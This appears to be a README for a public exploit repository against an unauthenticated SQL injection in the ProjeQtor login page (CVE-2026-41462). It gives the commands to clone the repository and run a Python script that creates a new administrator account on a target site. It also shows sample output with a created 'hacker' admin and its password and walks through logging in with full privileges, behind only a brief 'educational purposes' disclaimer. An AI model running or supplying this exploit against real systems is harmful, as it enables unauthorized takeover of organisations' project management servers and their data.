
CVE-2026-41462
Critical Unauthenticated SQL Injection in ProjeQtor ≤ 12.4.3
CVE-2026-41462 is a critical unauthenticated SQL Injection vulnerability in the login functionality of the ProjeQtor project management tool.
python3 CVE-2026-41462.py -u http://target.com --create-admin
# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
When the exploit is successful, you will see output similar to this:
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php
Open your browser and go to:
http://target.com/login.php
Login using the credentials shown in the script output.
If successful, you will land on the ProjeQtor Admin Dashboard with full administrative privileges.
Success Indicators:
| File | Description |
|---|---|
CVE-2026-41462.py | Main exploitation script |
CVE-2026-41462.yaml | Nuclei detection template |
README.md | This documentation |
Clone the repository:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
Run the exploit:
python3 CVE-2026-41462.py -u http://target.com --create-admin
Login with the newly created admin account.
This tool is intended for educational purposes and authorized penetration testing only. Unauthorized use is illegal.